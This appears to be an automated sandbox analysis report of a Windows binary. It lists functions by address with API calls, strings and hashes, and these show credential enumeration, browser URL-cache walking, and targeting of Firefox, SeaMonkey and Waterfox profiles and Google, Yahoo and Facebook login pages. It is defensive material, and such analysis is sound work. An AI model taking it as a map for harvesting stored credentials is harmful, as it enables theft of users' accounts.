                                                                                                                                                                                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                                    Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1f3 call 406e8f 726->729 732 40e1f8-40e1fa 729->732 733 40e270-40e27d call 406b53 732->733 734 40e1fc-40e219 call 40dd50 * 2 732->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                    • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                    • API String ID: 2804212203-2982631422
                                                                                                                                                                                    • Opcode ID: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                                                                                                                                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                                    Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                    • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                    • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                    • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                                                                                    • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 115830560-3916222277
                                                                                                                                                                                    • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                                                                                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                                                    Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 822 41837f-4183bf 823 4183c1-4183cc call 418197 822->823 824 4183dc-4183ec call 418160 822->824 829 4183d2-4183d8 823->829 830 418517-41851d 823->830 831 4183f6-41840b 824->831 832 4183ee-4183f1 824->832 829->824 833 418417-418423 831->833 834 41840d-418415 831->834 832->830 835 418427-418442 call 41739b 833->835 834->835 838 418444-41845d CreateFileW 835->838 839 41845f-418475 CreateFileA 835->839 840 418477-41847c 838->840 839->840 841 4184c2-4184c7 840->841 842 41847e-418495 GetLastError free 840->842 845 4184d5-418501 memset call 418758 841->845 846 4184c9-4184d3 841->846 843 4184b5-4184c0 call 444706 842->843 844 418497-4184b3 call 41837f 842->844 843->830 844->830 850 418506-418515 free 845->850 846->845 850->830
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                    • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                    • free.MSVCRT ref: 0041848B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                                    • String ID: |A
                                                                                                                                                                                    • API String ID: 77810686-1717621600
                                                                                                                                                                                    • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                                                                                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                    • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                                                                                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                    Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0041249C
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                    • String ID: r!A
                                                                                                                                                                                    • API String ID: 2791114272-628097481
                                                                                                                                                                                    • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                                                                                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                    • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                    Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                    • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                    • API String ID: 2936932814-4196376884
                                                                                                                                                                                    • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                                                                                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                    • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                                                                                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                    Function 0040A804 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: C:\Windows\system32
                                                                                                                                                                                    • API String ID: 669240632-2896066436
                                                                                                                                                                                    • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                                                                                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                                                                                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                    Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                    • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                    • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 697348961-0
                                                                                                                                                                                    • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                                                                                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                    Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                    • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                    • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                    • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                    • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                    • API String ID: 4039892925-11920434
                                                                                                                                                                                    • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                                                                                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                    • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                    Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                    • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                    • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                    • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                    • API String ID: 4039892925-2068335096
                                                                                                                                                                                    • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                                                                                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                    • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                                                                                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                    Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                    • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                    • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                    • memset.MSVCRT ref: 00404020
                                                                                                                                                                                    • memset.MSVCRT ref: 00404035
                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                    • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                    • API String ID: 4039892925-3369679110
                                                                                                                                                                                    • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                                                                                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                    • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
